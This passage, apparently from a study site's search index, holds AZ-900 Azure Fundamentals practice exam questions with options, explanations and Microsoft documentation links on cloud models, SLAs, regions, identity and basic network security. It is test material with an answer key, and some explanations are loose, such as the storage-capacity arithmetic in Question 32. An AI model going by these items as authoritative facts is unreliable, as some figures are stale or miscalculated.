        • Each Virtual Machine has a Resource Health blade

        Explanation: Each Virtual Machine has a Resource Health blade. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/resource-health-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-would-be-a-good-reason-to-have-multiple-azure-subscriptions","title":"Question 4:\u00a0What would be a good reason to have multiple Azure subscriptions?","text":"
        • There is one person/credit card paying for resources, and only one person who logs into Azure to manage the resources, but you want to be able to know which resources are used for which client project.
        • There is one person/credit card paying for resources, but many people who have accounts in Azure, and you need to separate out resources between clients so that there is absolutely no chance of resources being exposed between them.

        Explanation: Having multiple subscriptions can technically be done for any reason, but it only makes sense if you have to separate billing directly, or have actual clients logging into the Portal to manage their resources. For more info:\u00a0https://docs.microsoft.com/en-us/microsoft-365/enterprise/subscriptions-licenses-accounts-and-tenants-for-microsoft-cloud-offerings?view=o365-worldwide

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-which-of-the-following-is-not-an-example-of-infrastructure-as-a-service","title":"Question 5:\u00a0Which of the following is not an example of Infrastructure as a Service?","text":"
        • Azure SQL Database
        • SQL Server in a VM
        • Virtual Machine
        • Virtual Machine Scale Sets
        • Virtual Network

        Explanation: With Azure SQL Database, the infrastructure is not in your control. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-which-of-the-following-is-not-a-feature-of-azure-functions","title":"Question 6:\u00a0Which of the following is not a feature of Azure Functions?","text":"
        • Designed for backend batch applications that are continuously running
        • Can trigger the function based off of Azure events such as a new file being saved to a storage account blob container
        • Can possibly cost you nothing as there is a generous free tier
        • Can edit the code right in the Azure Portal using a code editor

        Explanation: Functions are designed for short pieces of code that start and end quickly. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-within-the-context-of-privacy-and-compliance-what-does-the-acronym-iso-stand-for-in-english","title":"Question 7: Within the context of privacy and compliance, what does the acronym ISO stand for, in English?","text":"
        • Information Systems Officer
        • Instead of
        • International Organization for Standardization
        • Intelligence and Security Office

        Explanation: ISO is a standards body, International Organization for Standardization. For more info:\u00a0https://www.iso.org/about-us.html

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-what-is-the-minimum-charge-for-having-an-azure-account-each-month-even-if-you-dont-use-any-resources","title":"Question 8:\u00a0What is the minimum charge for having an Azure Account each month, even if you don't use any resources?","text":"
        • $0
        • $200
        • $1
        • Negotiated with your enterprise manager

        Explanation: An Azure account can cost nothing if you don't use any resources or only use free resources. For more info:\u00a0https://azure.microsoft.com/en-us/pricing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-what-is-a-benefit-of-economies-of-scale","title":"Question 9: What is a benefit of economies of scale?","text":"
        • Prices of cloud servers and services are always going down. It'll be cheaper next year than it is this year.
        • Big companies don't need to make a profit on every sale
        • Big companies don't need to make a profit on the first product they sell you, because they will make a profit on the second
        • The more you buy of something, the cheaper it is for you

        Explanation: Economies of Scale - the more of an item that you buy, the cheaper it is per unit. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/principles-cloud-computing/3b-economies-of-scale

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-application-gateway-contains-what-additional-optional-security-feature-over-a-regular-load-balancer","title":"Question 10:\u00a0Application Gateway contains what additional optional security feature over a regular Load Balancer?","text":"
        • Azure AD Advanced Information Protection
        • Multi-Factor Authentication
        • Web Application Firewall (o
        • Advanced DDoS Protection

        Explanation: Application Gateways also comes with an optional Web Application Firewall (or WAF) as a security benefit. For more info:\u00a0https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/ag-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-approximately-how-many-regions-does-azure-have-around-the-world","title":"Question 11:\u00a0Approximately how many regions does Azure have around the world?","text":"
        • 60+
        • 25
        • 10
        • 40

        Explanation: There are 60+ Azure regions currently, in 10+ geographies. For more info:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-region

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-what-does-it-mean-if-a-service-is-in-public-preview-mode","title":"Question 12: What does it mean if a service is in Public Preview mode?","text":"
        • Anyone can use the service but it must not be for production use
        • Anyone can use the service for any reason
        • The service is generally available for use, and Microsoft will provide support for it
        • You have to apply to get selected in order to use that service

        Explanation: Public Preview is for anyone to use, but it is not supported nor guaranteed to continue to be available. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-cloud-computing-models-requires-the-highest-level-of-involvement-in-maintaining-the-operating-system-and-file-system-by-the-customer","title":"Question 13:\u00a0Which of the following cloud computing models requires the highest level of involvement in maintaining the operating system and file system by the customer?","text":"
        • IaaS
        • FaaS
        • PaaS
        • SaaS

        Explanation: IaaS or Infrastructure as a service requires you to keep your OS patched, close ports, and generally protect your own server. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-true-or-false-azure-cloud-shell-allows-access-to-the-bash-and-powershell-consoles-in-the-azure-portal","title":"Question 14:\u00a0True or false: Azure Cloud Shell allows access to the Bash and Powershell consoles in the Azure Portal","text":"
        • FALSE
        • TRUE

        Explanation: Cloud Shell - allows access to the Bash and Powershell consoles in the Azure Portal. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cloud-shell/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-which-of-the-following-elements-is-considered-part-of-the-perimeter-layer-of-security","title":"Question 15:\u00a0Which of the following elements is considered part of the \"perimeter\" layer of security?","text":"
        • Separate servers into distinct subnets by role
        • Locks on the data center doors
        • Keep operating systems up to date with patches
        • Use a firewall

        Explanation: Firewall is part of the perimeter security. For more information on the layered approach to network security:\u00a0https://docs.microsoft.com/en-us/learn/modules/intro-to-security-in-azure/5-network-security

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-what-is-the-concept-of-paired-regions","title":"Question 16:\u00a0What is the concept of paired regions?","text":"
        • Azure employees in those regions sometimes go on picnics together.
        • Each region of the world has one other region, usually in a completely separate country and geography, where it makes the most sense to place your backups. Like East US 2 is paired with South Korea.
        • When you deploy your code to one region of the world, it is automatically deployed to the paired region as an emergency backup.
        • Each region in the world has at least one other region in which is shares an extremely high speed connection, and where there is coordinated action by Azure not to do anything that will bring them both down at the same time.

        Explanation: Paired regions are usually in the same geo (not always) but are the most logical place to store backups because they have a high speed connection and Azure staggers the service updates to those regions. For more info:\u00a0https://docs.microsoft.com/en-us/azure/best-practices-availability-paired-regions

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-what-makes-estimating-the-cost-of-an-unmanaged-storage-account-difficult","title":"Question 17:\u00a0What makes estimating the cost of an unmanaged storage account difficult?","text":"
        • There is no way to predict the amount of data in the account
        • The cost of storage changes frequently
        • You are charged for data leaving Azure, and it's difficult to predict that
        • You are charged for data coming into Azure, and it's difficult to predict that

        Explanation: There is a cost for egress (bandwidth out) and it's hard to estimate how many bytes will be counted leaving an Azure network. For more info:\u00a0https://azure.microsoft.com/en-us/pricing/details/storage/page-blobs/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-why-is-a-user-id-and-password-sometimes-not-enough-to-prove-someone-is-who-they-say-they-are","title":"Question 18:\u00a0Why is a user id and password sometimes not enough to prove someone is who they say they are?","text":"
        • User id and password can be used by anyone such as a co-worker, ex-employee or hacker half-way around the world
        • Some people might choose the same user id and password
        • Passwords must be encrypted before being stored
        • Passwords are usually easy to forget

        Explanation: The truth is that someone can find a way to get a user id and password, even guess it, and that can be used by another person. For more information on other ways to prove self-identification such as Multi-Factor Authentication:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-which-tool-within-azure-is-comprised-of-azure-status-service-health-and-resource-health","title":"Question 19:\u00a0Which tool within Azure is comprised of : Azure Status, Service Health and Resource Health?","text":"
        • Azure Dashboard
        • Azure Monitor
        • Azure Service Health
        • Azure Advisor

        Explanation: Azure Service Health - lets you know about any Azure-related service issues including region-wide downtime. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-of-the-following-is-a-good-example-of-a-hybrid-cloud","title":"Question 20:\u00a0Which of the following is a good example of a Hybrid cloud?","text":"
        • Your users are inside your corporate network but your applications and data are in the cloud.
        • Your code is a mobile app that runs on iOS and Android phones, but it uses a database in the cloud.
        • A server runs in your own environment, but places files in the cloud so that it can extend the amount of storage it has access to.
        • Technology that allows you to grow living tissue on top of an exoskeleton, making Terminators impossible to spot among humans.

        Explanation: Hybrid Cloud - A mixture between your own private networks and servers, and using the public cloud for some things. Typically used to take advantage of the unlimited, inexpensive growth benefits of the public cloud. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-hybrid-cloud-computing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-where-do-you-go-within-the-azure-portal-to-find-all-of-the-third-party-virtual-machine-and-other-offers","title":"Question 21:\u00a0Where do you go within the Azure Portal to find all of the third-party virtual machine and other offers?","text":"
        • Azure mobile app
        • Azure Marketplace
        • Choose an image when creating a VM
        • Bing

        Explanation: Azure Marketplace contains thousands of services you can rent within the cloud. For more info:\u00a0https://azuremarketplace.microsoft.com/en-us

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-what-is-the-new-data-privacy-and-information-protection-regulation-that-took-effect-across-europe-in-may-2018","title":"Question 22:\u00a0What is the new data privacy and information protection regulation that took effect across Europe in May 2018?","text":"
        • FedRAMP
        • GDPR
        • ISO 9001:2015
        • PCI DSS

        Explanation: The General Data Protection Regulation (GDPR) took effect in Europe in May 2018. For more info:\u00a0https://docs.microsoft.com/en-us/microsoft-365/compliance/gdpr?view=o365-worldwide

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-why-is-azure-app-services-considered-platform-as-a-service","title":"Question 23:\u00a0Why is Azure App Services considered Platform as a Service?","text":"
        • You can decide on what type of virtual machine it runs - A-series, or D-series, or even H-series
        • You are responsible for keeping the operating system up to date with the latest patches
        • Azure App Services is not PaaS, it's Software as a Service.
        • You give Azure the code and configuration, and you have no access to the underlying hardware

        Explanation: You give Azure the code and configuration, and you have no access to the underlying hardware. For more info:\u00a0https://docs.microsoft.com/en-us/azure/app-service/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-what-two-types-of-ddos-protection-services-does-azure-provide-select-two","title":"Question 24: What two types of DDoS protection services does Azure provide? Select two.","text":"
        • DDoS\u00a0Premium Protection
        • DDoS\u00a0Advanced Protection
        • DDoS Network Protection
        • DDoS IP Protection

        Explanation: Azure DDoS Protection offers two types of DDoS protection services:

        • Network Protection\u00a0protects against volumetric attacks that target the network infrastructure. This type of protection is available for all Azure resources that are deployed in a virtual network.

        • IP Protection\u00a0protects against volumetric and protocol-based attacks that target specific public IP addresses. This type of protection is available for public IP addresses that are not deployed in a virtual network.

        For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-what-types-of-files-can-a-content-delivery-network-speed-up-the-delivery-of","title":"Question 25:\u00a0What types of files can a Content Delivery Network speed up the delivery of?","text":"
        • PDFs
        • Videos
        • Images
        • JavaScript files

        Explanation: All of them. Any static file that doesn't change. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cdn/cdn-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-what-is-the-concept-of-big-data","title":"Question 26:\u00a0What is the concept of Big Data?","text":"
        • A set of Azure services that allow you to use execute code in the cloud but don\u2019t require (or even allow) you to manage the underlying server
        • A form of artificial intelligence (AI) that allows systems to automatically learn and improve from experience without being explicitly programmed.
        • A small sensor or other device that constantly sends it's status and other data to the cloud
        • An extremely large set of data that you want to ingest and do analysis on; traditional software like SQL Server cannot handle Big Data as efficiently as specialized products

        Explanation: Big Data - a set of open source (Apache Hadoop) products that can do analysis on millions and billions of rows of data; current tools like SQL Server are not good for this scale

        For more info:\u00a0https://docs.microsoft.com/en-us/azure/architecture/guide/architecture-styles/big-data

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-select-all-features-part-of-azure-ad","title":"Question 27:\u00a0Select all features part of Azure AD?","text":"
        • Device Management
        • Log Alert Rule
        • Single sign-on
        • Smart lockout
        • Custom banned password list

        Explanation: The Log Alert Rule is not a feature of Azure AD. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-in-which-us-state-is-the-east-us-2-region","title":"Question 28:\u00a0In which US state is the East US 2 region?","text":"
        • Iowa
        • Virginia
        • Texas
        • California

        Explanation: East US 2 is in the Eastern state of Virginia, close to Washington DC. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/data-residency/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-windows-servers-use-remote-desktop-protocol-rdp-in-order-for-administrators-to-get-access-to-manage-the-server-linux-servers-use-ssh-what-is-the-recommendation-for-ensuring-the-security-of-these-protocols","title":"Question 29:\u00a0Windows servers use \"remote desktop protocol\" (RDP) in order for administrators to get access to manage the server. Linux servers use SSH. What is the recommendation for ensuring the security of these protocols?","text":"
        • Disable RDP access using the Windows Services control panel admin tool
        • Ensure strong passwords on your Windows admin accounts
        • Do not enable SSH access for Linux servers
        • Do not allow public Internet access over the RDP and SSH ports directly to the server. Instead use a secure server like Bastion to control access to the servers behind.

        Explanation: You need to either control access to the RDP and SSH ports to a very specific range of IPs, enable the ports only when you are using it, or use a Bastion server/jump box to protect those servers. For more info:\u00a0https://docs.microsoft.com/en-us/azure/bastion/bastion-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-what-does-arm-stand-for-in-azure","title":"Question 30:\u00a0What does ARM stand for in Azure?","text":"
        • Account Resource Manager
        • Availability, Reliability, Maintainability
        • Advanced RISC Machine
        • Azure Resource Manager

        Explanation: Azure Resource Manager (ARM) - this is the common resource deployment model that underlies all resource creation or modification; no matter whether you use the portal, powershell or the SDK, the Azure Resource Manager takes those commands and executes them. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-in-what-way-does-multi-factor-authentication-increase-the-security-of-a-user-account","title":"Question 31:\u00a0In what way does Multi-Factor Authentication increase the security of a user account?","text":"
        • It requires the user to possess something like their phone to read an SMS, use a mobile app, or biometric identification.
        • It requires single sign-on functionality
        • It doesn't. Multi-Factor Authentication is more about access and authentication than account security.
        • It requires users to be approved before they can log in for the first time.

        Explanation: MFA requires that the user have access to their mobile phone for using SMS or an app. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-what-is-the-maximum-amount-of-azure-storage-space-a-single-subscription-can-store","title":"Question 32:\u00a0What is the maximum amount of Azure Storage space a single subscription can store?","text":"
        • 500 GB
        • Virtually unlimited
        • 5 PB
        • 2 TB

        Explanation: A single Azure subscription can have up to 250 storage accounts per region, and each storage account can store up to 5 Petabytes. That is 31 million Terabytes. This is probably 15-20 times what Google, Amazon, Microsoft and Facebook use combined. That's a lot. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits#storage-limits

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-how-do-you-get-access-to-services-in-private-preview-mode","title":"Question 33:\u00a0How do you get access to services in Private Preview mode?","text":"
        • You cannot use private preview services.
        • They are available in the marketplace. You simply use them.
        • You must apply to use them.
        • You must agree to a terms of use first.

        Explanation: Private Preview means you must apply to use them. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-what-is-the-concept-of-being-able-to-get-your-applications-and-data-running-in-another-environment-quickly","title":"Question 34:\u00a0What is the concept of being able to get your applications and data running in another environment quickly?","text":"
        • Business Continuity / Disaster Recovery (BC/DR)
        • Azure Blueprint
        • Azure Devops
        • Reproducible deployments

        Explanation: Disaster Recovery - the ability to recover from a big failure within an acceptable period of time, with an acceptable amount of data lost. For more info on Backup and Disaster Recovery:\u00a0https://azure.microsoft.com/en-us/solutions/backup-and-disaster-recovery/ For more info on Azure\u2019s built-in disaster recovery as a service (DRaaS):\u00a0https://azure.microsoft.com/en-us/services/site-recovery/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-which-of-the-following-is-considered-a-downside-to-using-capital-expenditure-capex","title":"Question 35:\u00a0Which of the following is considered a downside to using Capital Expenditure (CapEx)?","text":"
        • It does not require a lot of up front money
        • You can deduct expenses as they occur
        • You are not guaranteed to make a profit
        • You must wait over a period of years to depreciate that investment on your taxes

        Explanation: One of the downsides of CapEx is that the money invested cannot be deducted immediately from your taxes. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/principles-cloud-computing/3c-capex-vs-opex

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-what-azure-resource-allows-you-to-evenly-split-traffic-coming-in-and-direct-it-to-several-identical-virtual-machines-to-do-the-work-and-respond-to-the-request","title":"Question 36:\u00a0What Azure resource allows you to evenly split traffic coming in and direct it to several identical virtual machines to do the work and respond to the request?","text":"
        • Load Balancer or Application Gateway
        • Azure Logic Apps
        • Virtual Network
        • Azure App Services

        Explanation: This is the core feature of either a Load Balancer or Application Gateway. For more info:\u00a0https://docs.microsoft.com/en-us/azure/load-balancer/load-balancer-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-true-or-false-azure-charges-for-bandwidth-used-inbound-to-azure","title":"Question 37:\u00a0True or false: Azure charges for bandwidth used \"inbound\" to Azure","text":"
        • FALSE
        • TRUE

        Explanation: Ingress bandwidth is free. You pay for egress (outbound). For more info:\u00a0https://azure.microsoft.com/en-us/pricing/details/bandwidth/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-which-free-azure-security-service-checks-all-traffic-travelling-over-a-subnet-against-a-set-of-rules-before-allowing-it-in-or-out","title":"Question 38:\u00a0Which free Azure security service checks all traffic travelling over a subnet against a set of rules before allowing it in, or out.","text":"
        • Network Security Group
        • Advanced Threat Protection (ARP)
        • Azure Firewall
        • Azure DDoS Protection

        Explanation: Network Security Group (NSG) - a fairly basic set of rules that you can apply to both inbound traffic and outbound traffic that lets you specify what sources, destinations and ports are allowed to travel through from outside the virtual network to inside the virtual network. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/security-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-what-is-the-concept-of-availability","title":"Question 39:\u00a0What is the concept of Availability?","text":"
        • A system must have 100% uptime to be considered available
        • A system that can scale up and scale down depending on customer demand
        • The percentage of time a system responds properly to requests, expressed as a percentage over time
        • A system that has a single point of failure

        Explanation: Availability - what percentage of time does a system respond properly to requests, expressed as a percentage over time. For more information on region and availability zones see:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-overview. For more information on availability options for virtual machines see:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/availability.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-is-the-benefit-of-using-powershell-over-cli","title":"Question 40:\u00a0What is the benefit of using Powershell over CLI?","text":"
        • More powerful commands
        • Quicker to deploy VMs
        • Cheaper
        • No benefit, it's the same

        Explanation: There is no benefit, only a matter of personal choice. For more info on Azure CLI:\u00a0https://docs.microsoft.com/en-us/cli/azure/what-is-azure-cli?view=azure-cli-latest. For more info on Azure Powershell:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-how-many-regions-does-azure-have-in-brazil","title":"Question 41:\u00a0How many regions does Azure have in Brazil?","text":"
        • 2
        • 0
        • 1
        • 4

        Explanation: There is 1 region in Brazil. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/geographies/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-what-azure-product-allows-you-to-autoscale-virtual-machines-from-1-to-1000-instances-and-also-provides-load-balancing-services-built-in","title":"Question 42:\u00a0What Azure product allows you to autoscale virtual machines from 1 to 1000 instances, and also provides load balancing services built in?","text":"
        • Virtual Machine Scale Sets
        • Azure App Services
        • Azure Virtual Machines
        • Application Gateway

        Explanation: Virtual Machine Scale Sets - these are a set of identical virtual machines (from 1 to 1000 instances) that are designed to auto-scale up and down based on user demand. For more info:\u00a0https://azure.microsoft.com/en-us/services/virtual-machine-scale-sets/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-what-does-it-mean-if-a-service-is-in-general-availability-ga-mode","title":"Question 43: What does it mean if a service is in General Availability (GA) mode?","text":"
        • Anyone can use the service for any reason
        • You have to apply to get selected in order to use that service
        • Anyone can use the service but it must not be for production use
        • The service has now reached public preview, and Microsoft will provide support for it

        Explanation: Anyone can use a GA service. It is fully supported and can be used for production. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-each-person-has-their-own-user-id-and-password-to-log-into-azure-but-how-many-subscriptions-can-a-single-account-be-associated-with","title":"Question 44:\u00a0Each person has their own user id and password to log into Azure. But how many subscriptions can a single account be associated with?","text":"
        • 10
        • 250 per region
        • No limit
        • One

        Explanation: There is not a limit to the number of subscriptions a single user can be included on.

        For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-is-the-azure-sla-for-two-or-more-virtual-machines-in-an-availability-set","title":"Question 45:\u00a0What is the Azure SLA for two or more Virtual Machines in an Availability Set?","text":"
        • 100%
        • 99.90%
        • 99.99%
        • 99.95%

        Explanation: 99.95% For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-which-azure-service-is-the-recommended-identity-as-a-service-offering-inside-azure","title":"Question 46:\u00a0Which Azure service is the recommended Identity-as-a-Service offering inside Azure?","text":"
        • Azure Active Directory (AD)
        • Azure Portal
        • Identity and Access Management (IAM)
        • Azure Front Door

        Explanation: Azure AD is the identity service designed for web protocols, that you can use for your applications. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-what-is-the-benefit-of-using-a-command-line-tool-like-powershell-or-cli-as-opposed-to-the-azure-portal","title":"Question 47:\u00a0What is the benefit of using a command line tool like Powershell or CLI as opposed to the Azure portal?","text":"
        • Quicker to deploy VMs
        • Cheaper
        • Automation

        Explanation: The real benefit is automation. Being able to write a script to do something is better than having to do it manually each time. For more info on Azure CLI:\u00a0https://docs.microsoft.com/en-us/cli/azure/what-is-azure-cli?view=azure-cli-latest. For more info on Azure Powershell:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-what-database-service-is-specifically-designed-to-be-extremely-fast-in-responding-to-requests-for-small-amounts-of-data-called-low-latency","title":"Question 48:\u00a0What database service is specifically designed to be extremely fast in responding to requests for small amounts of data (called low latency)?","text":"
        • SQL Database
        • SQL Data Warehouse
        • Cosmos DB
        • SQL Server in a VM

        Explanation: Cosmos DB - extremely low latency (fast) storage designed for smaller pieces of data quickly; SaaS. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cosmos-db/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-if-you-are-a-us-federal-state-local-or-tribal-government-entities-and-their-solution-providers-which-azure-option-should-you-be-looking-to-register-for","title":"Question 49: If you are a US federal, state, local, or tribal government entities and their solution providers, which Azure option should you be looking to register for?","text":"
        • Azure is not available for government officials
        • Azure Government
        • Azure Department of Defence
        • Azure Public Portal

        Explanation: Hopefully, it's clear that US Federal, State, Local and Tribal governments can use the US Government portal. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-government/documentation-government-welcome

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-what-is-the-service-level-agreement-for-two-or-more-azure-virtual-machines-that-have-been-manually-placed-into-different-availability-zones-in-the-same-region","title":"Question 50:\u00a0What is the service level agreement for two or more Azure Virtual Machines that have been manually placed into different Availability Zones in the same region?","text":"
        • 99.95%
        • 99.90%
        • 99.99%
        • 100%

        Explanation: 99.99%. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-3","title":"Test 3","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-what-is-the-significance-of-the-azure-region-why-is-it-important","title":"Question 1:\u00a0What is the significance of the Azure region? Why is it important?","text":"
        • You must select a region when creating most resources, and the region is the area of the world where those resources will be physically located.
        • Once you select a region, you cannot create resources outside of that region. So selecting the right region is an important decision.
        • Region is just a folder structure in which you organize resources, much like file folders on a computer.
        • Even though you have to choose a region when creating resources, there's generally no consequence of what you select. You can create a network in one region and then create virtual machines for that network in another region.

        Explanation: The region is the area of the world where resources get created. You can create resources in any region that you have access to. But there are sometimes restrictions when creating a resource in one region that related resources like networks must also be in the same region for logical reasons. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/geographies/#overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-true-or-false-through-azure-active-directory-one-can-control-access-to-an-application-but-not-the-resources-of-the-application","title":"Question 2:\u00a0TRUE OR FALSE: Through Azure Active Directory one can control access to an application but not the resources of the application.","text":"
        • FALSE
        • TRUE

        Explanation: Azure AD can control the access of both the apps and the app resources. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-what-is-the-name-of-the-open-source-project-run-by-the-apache-foundation-that-maps-to-the-hdinsight-tools-within-azure","title":"Question 3:\u00a0What is the name of the open source project run by the Apache foundation that maps to the HDInsight tools within Azure?","text":"
        • Apache Jazz
        • Apache Cayenne
        • Apache Jaguar
        • Apache Hadoop
        • Explanation: Hadoop is open source home of the HDInsight tools. For more info:\u00a0https://docs.microsoft.com/en-us/azure/hdinsight/hadoop/apache-hadoop-introduction
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-which-tool-within-the-azure-portal-will-make-specific-recommendations-based-on-your-actual-usage-for-how-you-can-improve-your-use-of-azure","title":"Question 4:\u00a0Which tool within the Azure Portal will make specific recommendations based on your actual usage for how you can improve your use of Azure?","text":"
        • Azure Monitor
        • Azure Service Health
        • Azure Dashboard
        • Azure Advisor

        Explanation: Azure Advisor - a tool that will analyze your use of Azure and make you specific recommendations based on your usage across availability, security, performance and cost categories. For more info:\u00a0https://docs.microsoft.com/en-us/azure/advisor/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-what-does-it-mean-that-security-is-a-shared-model-in-azure","title":"Question 5: What does it mean that security is a \"shared model\" in Azure?","text":"
        • Both users and Azure have responsibilities for security.
        • You must keep your security keys private and ensure it doesn't get out.
        • Azure takes care of security completely.
        • Azure takes no responsibility for security.

